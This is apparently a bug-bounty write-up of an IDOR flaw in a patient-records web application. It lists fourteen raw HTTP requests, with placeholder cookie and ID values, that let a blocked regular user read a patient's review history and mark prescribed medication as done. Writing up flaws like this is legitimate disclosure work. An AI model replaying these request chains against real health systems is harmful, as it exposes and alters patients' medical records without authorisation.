Hello folks, It’s me again m7arm4n :) I want to tell the story of a strange IDOR today. So let’s get into it…
This website has 2 types of users :
User A → Admin who can set privacy for other users and can see
the patients etc…
User B→ Normal User who is unable to set privacy for other users
- To set up the attack scenario, the admin user or User A must create an account of a patient from the patient tab → add the patient button.
- We go to Setting → Manage Privacy And Restriction → Book The User B Account And Submit.
- Then We Go to the patient tab from the admin account, select the patient, click the review history button, and then click add a prescription reported by patient search and add randomly.
Basically what we are doing here is requesting the API to log our
requests that made a change an a patient record after that we have found the structure of the request we no longer need to have the admin account and we use the attacker’s account because a regular user account can perform the attack.
Steps to reproduce (Attacker Account)
Let’s get back to User B Account, here we have to make 4 changes to perform the attack in the following requests: Cookie & patientID & userID & RxID
To find the 4 values and parameters needed We go to the patient tab and click on it to make the request and capture it, in the path /API/PrivacyOverrideApi/CheckIsRestrictedUser/ we can find what we are looking for
Now we paste the following requests in order and send them:
Request 1:
POST /api/PrivacyOverrideApi/CheckIsRestrictedUser HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
{"patientId":"patientId","userId":"userId"}
Request 2:
POST /api/selectpatientapi/setpatientinfo HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 38
"patientId"
Request 3:
POST /api/PatientMedRecApi/GetMedReconciliationInfo HTTP/2
Host: domain.tld
Cookie: Cookie
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 0
Request 4:
POST /api/contentload/retrieverefreshpayload HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 15
"ReviewHistory"
Request 5:
GET /LogRxDisplay.aspx?page=reviewhistory& HTTP/2
Host: domain.tld
Cookie: Cookie
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Request 6:
POST /api/PatientHeaderAPI/GetPatientHeaderData HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 38
"patientId"
Request 7:
POST /api/ReviewHistoryApi/AuditAccessAndGetStartupParameters HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Length: 0
Request 8: (In response to this request you can find the RxID value Copy the value)
POST /api/ReviewHistoryApi/GetPatientReviewHistory HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 115
{"statusFilter":0,"dataRetrievalContext":{"SortColumnName":"RxDate","SortDirection":1,"SkipRows":0,"FetchRows":50}}
Request 9:
POST /api/PatientMedRecApi/GetMedReconciliationInfo HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Length: 0
Request 10:
POST /api/RxDetailApi/GetRxDetail HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 38
"RxID_value"
Request 11:
POST /api/ReviewHistoryApi/ExecuteCompleteActionMethod HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 40
["RxID_value"]
Request 12(This request only returned the specific patient’s info but there is no ID!):
POST /api/ReviewHistoryApi/GetPatientReviewHistory HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 115
{"statusFilter":0,"dataRetrievalContext":{"SortColumnName":"RxDate","SortDirection":1,"SkipRows":0,"FetchRows":50}}
Request 13(This request only returned the specific patient’s info but there is no ID!):
POST /api/PatientHeaderAPI/GetPatientActiveMeds HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 0
Request 14(This request only returned the specific patient’s info but there is no ID!):
POST /api/PatientMedRecApi/GetMedReconciliationInfo HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 0
What happened and what is the impact of it :
First, all we need to perform this attack is not from the admin account all we need to do is get the request structure from the admin and keep it then we can now change all of its data to attacker data and also in this scenario our admin Blocks the attacker account to access patient but our dear attacker is still able to read the history of the patient and if admin set medicine for the patient attacker can mark the med process done without any permission